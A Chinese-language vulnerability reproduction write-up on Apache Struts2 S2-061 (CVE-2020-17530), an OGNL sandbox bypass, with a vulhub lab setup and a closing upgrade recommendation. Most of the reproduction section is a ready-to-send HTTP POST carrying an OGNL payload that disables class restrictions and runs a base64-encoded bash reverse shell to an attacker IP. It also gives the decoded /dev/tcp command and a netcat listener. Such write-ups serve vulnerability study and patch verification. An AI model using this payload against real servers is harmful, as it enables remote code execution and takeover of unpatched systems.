0x02 漏洞概述
CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。
在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行。
0x03 影响版本
Struts 2.0.0 – Struts 2.5.25
0x04 环境搭建
为
这里用的vulhub环境一键搭建
执行如下命令启动一个Struts2 2.5.25版本环境
https://github.com/vulhub/vulhub/blob/master/struts2/s2-061/
1、启动Struts 2.5.25环境:
docker-compose up -d
2、环境启动后,访问查看首页
http://target-ip:8080/index.action
0x05 漏洞复现
1、发送如下数据包,即可执行反弹shell命令:
POST /index.action HTTP/1.1
Host:192.168.20.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language:en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 922
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
2、这里为反弹shell命令:
(#arglist.add("bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute"))
进行linux反弹shell命令:
bash -i >& /dev/tcp/192.168.20.128/66660>&1(PS:反弹shell涉及到管道符问题于是要将命令进行base64编码)
base64在线编码:
http://www.jackson-t.ca/runtime-exec-payloads.html
3、在攻击机监听本地端口:
nc -lvvp 6666
运行脚本成功反弹回shell
0x06 修复建议
Struts官方已经发布了新版本修复了上述漏洞,请受影响的用户尽快升级进行防护。
参考链接:
https://github.com/vulhub/vulhub/blob/master/struts2/s2-061/README.zh-cn.md
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!